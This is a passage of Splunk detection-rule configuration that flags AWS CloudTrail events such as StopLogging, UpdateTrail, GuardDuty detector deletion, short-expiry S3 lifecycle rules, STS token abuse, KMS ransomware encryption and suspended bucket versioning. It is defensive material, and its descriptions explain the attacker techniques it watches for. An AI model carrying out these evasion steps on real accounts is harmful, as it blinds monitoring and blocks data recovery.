CloudWatch alarm, delete a set of detectors from your Guardduty environment or simply delete a bunch of CloudWatch alarms to remain stealthy and avoid detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Web"] action.escu.eli5 = This analytic looks for several delete specific API calls made to AWS Security Services like CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the CloudWatch alarm, delete a set of detectors from your Guardduty environment or simply delete a bunch of CloudWatch alarms to remain stealthy and avoid detection. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that it is a legitimate admin activity. Please consider filtering out these noisy events using userAgent, user_arn field names. action.escu.creation_date = 2022-07-26 action.escu.modification_date = 2022-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Impair Security Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Impair Security Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms") | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName values(eventSource) as eventSource values(requestParameters.*) as * by src region user_arn aws_account_id user_type user_agent errorCode| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_defense_evasion_impair_security_services_filter` [ESCU - AWS Defense Evasion PutBucketLifecycle - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies `PutBucketLifecycle` events in CloudTrail logs where a user has created a new lifecycle rule for an S3 bucket with a short expiration period. Attackers may use this API call to impair the CloudTrail logging by removing logs from the S3 bucket by changing the object expiration day to 1 day, in which case the CloudTrail logs will be deleted. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies `PutBucketLifecycle` events in CloudTrail logs where a user has created a new lifecycle rule for an S3 bucket with a short expiration period. Attackers may use this API call to impair the CloudTrail logging by removing logs from the S3 bucket by changing the object expiration day to 1 day, in which case the CloudTrail logs will be deleted. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. We recommend our users to set the expiration days value according to your company's log retention policies. action.escu.known_false_positives = While this search has no known false positives, it is possible that it is a legitimate admin activity. Please consider filtering out these noisy events using userAgent, user_arn field names. action.escu.creation_date = 2022-07-25 action.escu.modification_date = 2022-07-25 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion PutBucketLifecycle - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion PutBucketLifecycle - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 40, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=PutBucketLifecycle user_type=IAMUser errorCode=success | spath path=requestParameters{}.LifecycleConfiguration{}.Rule{}.Expiration{}.Days output=expiration_days | spath path=requestParameters{}.bucketName output=bucket_name | stats count min(_time) as firstTime max(_time) as lastTime by src region eventName userAgent user_arn aws_account_id expiration_days bucket_name user_type| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where expiration_days < 3 | `aws_defense_evasion_putbucketlifecycle_filter` [ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies `StopLogging` events in CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies `StopLogging` events in CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. action.escu.how_to_implement = You must install Splunk AWS Add on and enable Cloudtrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped cloudtrail logging. Please investigate this activity. action.escu.creation_date = 2022-07-12 action.escu.modification_date = 2022-07-12 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has stopped Cloudtrail logging for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies `StopLogging` events in CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. action.notable.param.rule_title = AWS Defense Evasion Stop Logging Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = StopLogging eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as stopped_cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_defense_evasion_stop_logging_cloudtrail_filter` [ESCU - AWS Defense Evasion Update Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies `UpdateTrail` events in CloudTrail logs. Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies `UpdateTrail` events in CloudTrail logs. Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has updated cloudtrail logging. Please investigate this activity. action.escu.creation_date = 2022-07-17 action.escu.modification_date = 2022-07-17 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Update Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has updated a cloudtrail logging for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Update Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies `UpdateTrail` events in CloudTrail logs. Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.notable.param.rule_title = AWS Defense Evasion Update Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = UpdateTrail eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_update_cloudtrail_filter` [ESCU - aws detect attach to role policy - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of an user attaching itself to a different role trust policy. This can be used for lateral movement and escalation of privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of an user attaching itself to a different role trust policy. This can be used for lateral movement and escalation of privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Attach to policy can create a lot of noise. This search can be adjusted to provide specific values to identify cases of abuse (i.e status=failure). The search can provide context for common users attaching themselves to higher privilege policies or even newly created policies. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect attach to role policy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect attach to role policy - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` attach policy| spath requestParameters.policyArn | table sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn eventName errorCode errorMessage status action requestParameters.policyArn userIdentity.sessionContext.attributes.mfaAuthenticated userIdentity.sessionContext.attributes.creationDate | `aws_detect_attach_to_role_policy_filter` [ESCU - aws detect permanent key creation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and they are only needed for programmatic calls. Creation of Permanent key is an important event to monitor. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and they are only needed for programmatic calls. Creation of Permanent key is an important event to monitor. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all permanent key creations are malicious. If there is a policy of rotating keys this search can be adjusted to provide better context. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect permanent key creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect permanent key creation - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey "userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent action status responseElements.accessKey.createDate responseElements.accessKey.status responseElements.accessKey.accessKeyId |`aws_detect_permanent_key_creation_filter` [ESCU - aws detect role creation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of role creation by IAM users. Role creation is an event by itself if user is creating a new role with trust policies different than the available in AWS and it can be used for lateral movement and escalation of privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of role creation by IAM users. Role creation is an event by itself if user is creating a new role with trust policies different than the available in AWS and it can be used for lateral movement and escalation of privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = CreateRole is not very common in common users. This search can be adjusted to provide specific values to identify cases of abuse. In general AWS provides plenty of trust policies that fit most use cases. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect role creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect role creation - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` event_name=CreateRole action=created userIdentity.type=AssumedRole requestParameters.description=Allows* | table sourceIPAddress userIdentity.principalId userIdentity.arn action event_name awsRegion http_user_agent mfa_auth msg requestParameters.roleName requestParameters.description responseElements.role.arn responseElements.role.createDate | `aws_detect_role_creation_filter` [ESCU - aws detect sts assume role abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = Sts:AssumeRole can be very noisy as it is a standard mechanism to provide cross account and cross resources access. This search can be adjusted to provide specific values to identify cases of abuse. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect sts assume role abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect sts assume role abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` user_type=AssumedRole userIdentity.sessionContext.sessionIssuer.type=Role | table sourceIPAddress userIdentity.arn user_agent user_access_key status action requestParameters.roleName responseElements.role.roleName responseElements.role.createDate | `aws_detect_sts_assume_role_abuse_filter` [ESCU - aws detect sts get session token abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of suspicious use of sts:GetSessionToken. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Sts:GetSessionToken can be very noisy as in certain environments numerous calls of this type can be executed. This search can be adjusted to provide specific values to identify cases of abuse. In specific environments the use of field requestParameters.serialNumber will need to be used. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect sts get session token abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect sts get session token abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser| spath eventName | search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn userName userAgent user_type status region | `aws_detect_sts_get_session_token_abuse_filter` [ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-11 action.escu.modification_date = 2021-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Ransomware Cloud"] action.risk = 1 action.risk.param._risk_message = AWS account is potentially compromised and user $userIdentity.principalId$ is trying to compromise other accounts. action.risk.param._risk = [{"risk_object_field": "userIdentity.principalId", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Detect Users creating keys with encrypt policy without MFA - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware Cloud"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides detection of KMS keys where action kms:Encrypt is accessible for everyone (also outside of your organization). This is an indicator that your account is compromised and the attacker uses the encryption key to compromise another company. action.notable.param.rule_title = AWS Detect Users creating keys with encrypt policy without MFA action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | spath input=key_policy_statements output=key_policy_action_2 path=Action{} | eval key_policy_action=mvappend(key_policy_action_1, key_policy_action_2) | spath input=key_policy_statements output=key_policy_principal path=Principal.AWS | search key_policy_action="kms:Encrypt" AND key_policy_principal="*" | stats count min(_time) as firstTime max(_time) as lastTime by eventName eventSource eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_detect_users_creating_keys_with_encrypt_policy_without_mfa_filter` [ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides detection of users with KMS keys performing encryption specifically against S3 buckets. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of users with KMS keys performing encryption specifically against S3 buckets. action.escu.how_to_implement = You must install Splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = There maybe buckets provisioned with S3 encryption action.escu.creation_date = 2022-11-11 action.escu.modification_date = 2022-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Ransomware Cloud"] action.risk = 1 action.risk.param._risk_message = User $user$ with KMS keys is performing encryption, against S3 buckets on these files $dest_file$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "dest_file", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Detect Users with KMS keys performing encryption S3 - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware Cloud"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms" | rename requestParameters.bucketName AS bucketName, requestParameters.x-amz-copy-source AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime max(_time) as lastTime values(bucketName) as bucketName values(src_file) AS src_file values(dest_file) AS dest_file values(userAgent) AS userAgent values(region) AS region values(src) AS src by user | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` |`aws_detect_users_with_kms_keys_performing_encryption_s3_filter` [ESCU - AWS Disable Bucket Versioning - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects AWS cloudtrail events where bucket versioning is suspended by a user. Versioning allows the AWS Administrators to maintain different version of the S3 bucket which can be used to recover deleted data. Adversaries have leveraged this technique in the wild during a ransomware incident to disable versioning so the client cannot recover the data. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects AWS cloudtrail events where bucket versioning is suspended by a user. Versioning allows the AWS Administrators to maintain different version of the S3 bucket which can be used to recover deleted data. Adversaries have leveraged this technique in the wild during a ransomware incident to disable versioning so the client cannot recover the data. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = It is possible that an AWS Administrator has legitimately disabled versioning on certain buckets to avoid costs. action.escu.creation_date = 2023-05-01 action.escu.modification_date = 2023-05-01 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Disable Bucket Versioning - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = Bucket Versioning is suspended for S3 buckets- $bucket_name$ by user $user_arn$ from IP address $src_ip$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Disable Bucket Versioning - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName= PutBucketVersioning "requestParameters.VersioningConfiguration.Status"=Suspended | stats count 